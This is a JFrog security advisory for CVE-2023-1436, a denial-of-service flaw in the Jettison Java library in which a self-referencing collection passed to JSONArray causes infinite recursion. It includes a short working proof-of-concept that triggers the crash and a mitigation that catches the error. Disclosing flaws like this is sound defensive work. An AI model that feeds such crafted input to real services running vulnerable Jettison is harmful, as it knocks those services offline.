JFrog Security Research
< Back

XRAY-427911 - Jettison JSONArray DoS

CVE-2023-1436 | CVSS 5.9

JFrog Severity:medium

Discovered ByNitay Meironof the JFrog Security Research Team

Published 16 Mar, 2023 | Last updated 16 Mar, 2023

Infinite recursion in Jettison leads to denial of service when creating a crafted JSONArray

org.codehaus.jettison:jettison

(,1.5.4)

An infinite recursion is triggered in Jettison when constructing a JSONArray from a Collection that contains a self-reference in one of its elements. This leads to a StackOverflowError exception being thrown.

public class POC {
    public static void main(String[] args) throws JSONException {
        ArrayList<Object> list = new ArrayList<>();
        list.add(list);
        JSONArray jsonArray = new JSONArray(list);
    }
}

Wrap Jettison's JSONArray constructor with exception handling -

try {
    JSONArray jsonArray = new JSONArray(list);
}
catch(StackOverflowError e) {
    System.err.println("ERROR: Stack limit reached");
}

No references are supplied for this issue

< Back